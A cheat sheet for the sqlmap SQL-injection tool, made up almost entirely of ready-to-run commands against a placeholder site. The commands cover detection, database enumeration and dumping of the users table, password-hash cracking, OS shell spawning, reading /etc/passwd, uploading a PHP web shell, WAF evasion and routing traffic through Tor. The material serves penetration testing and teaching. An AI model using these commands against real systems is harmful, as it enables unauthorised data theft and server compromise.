ENNAENNA

SQLMap Cheat Sheet

Automated SQL injection detection and exploitation with sqlmap. From basic URL testing through database enumeration, OS-level access, and WAF bypass techniques.

View sqlmap tool page

Basic Usage

Test a URL parameter for SQL injection with auto-confirm

$ sqlmap -u "http://target.com/page?id=1" --batch

Test injection from a saved HTTP request file (from Burp)

$ sqlmap -r request.txt --batch

Automatically detect and test HTML forms on a page

$ sqlmap -u "http://target.com/page?id=1" --forms --batch

Test with authentication cookies

$ sqlmap -u "http://target.com/page?id=1" --cookie="session=abc123" --batch

Test POST parameters for injection

$ sqlmap -u "http://target.com/api/v1/users" --method=POST --data="id=1&name=test" --batch

Injection Techniques

Use only boolean-blind, error-based, and UNION techniques

$ sqlmap -u "http://target.com/page?id=1" --technique=BEU --batch

Maximum detection level and risk for thorough testing

$ sqlmap -u "http://target.com/page?id=1" --level=5 --risk=3 --batch

Custom injection prefix and suffix for complex queries

$ sqlmap -u "http://target.com/page?id=1" --prefix="')" --suffix="-- -" --batch

Second-order injection where result appears on a different page

$ sqlmap -u "http://target.com/page?id=1" --second-url="http://target.com/result" --batch

Enumeration

Enumerate all available databases

$ sqlmap -u "http://target.com/page?id=1" --dbs --batch

List all tables in a specific database

$ sqlmap -u "http://target.com/page?id=1" -D dbname --tables --batch

Dump all rows from the users table

$ sqlmap -u "http://target.com/page?id=1" -D dbname -T users --dump --batch

Get current DB user, database name, and DBA status

$ sqlmap -u "http://target.com/page?id=1" --current-user --current-db --is-dba --batch

Enumerate and attempt to crack database user password hashes

$ sqlmap -u "http://target.com/page?id=1" --passwords --batch

OS Access

Attempt to spawn an interactive OS shell via SQL injection

$ sqlmap -u "http://target.com/page?id=1" --os-shell --batch

Execute a single OS command through the injection point

$ sqlmap -u "http://target.com/page?id=1" --os-cmd="whoami" --batch

Read a file from the server filesystem via injection

$ sqlmap -u "http://target.com/page?id=1" --file-read="/etc/passwd" --batch

Upload a local file to the target server

$ sqlmap -u "http://target.com/page?id=1" --file-write="shell.php" --file-dest="/var/www/html/shell.php" --batch

Tamper Scripts & Evasion

Replace spaces with inline comments to bypass WAF

$ sqlmap -u "http://target.com/page?id=1" --tamper=space2comment --batch

Chain tampers: BETWEEN instead of comparison, randomize case

$ sqlmap -u "http://target.com/page?id=1" --tamper=between,randomcase --batch

Randomize User-Agent and add delay between requests

$ sqlmap -u "http://target.com/page?id=1" --random-agent --delay=2 --batch

Route traffic through Tor and verify connectivity

$ sqlmap -u "http://target.com/page?id=1" --tor --tor-type=SOCKS5 --check-tor --batch

More Cheat Sheets

Nmap Cheat Sheet

6 sections

Hashcat Cheat Sheet

5 sections

ffuf Cheat Sheet

5 sections

Nuclei Cheat Sheet

5 sections

Subfinder Cheat Sheet

4 sections

Metasploit Cheat Sheet

5 sections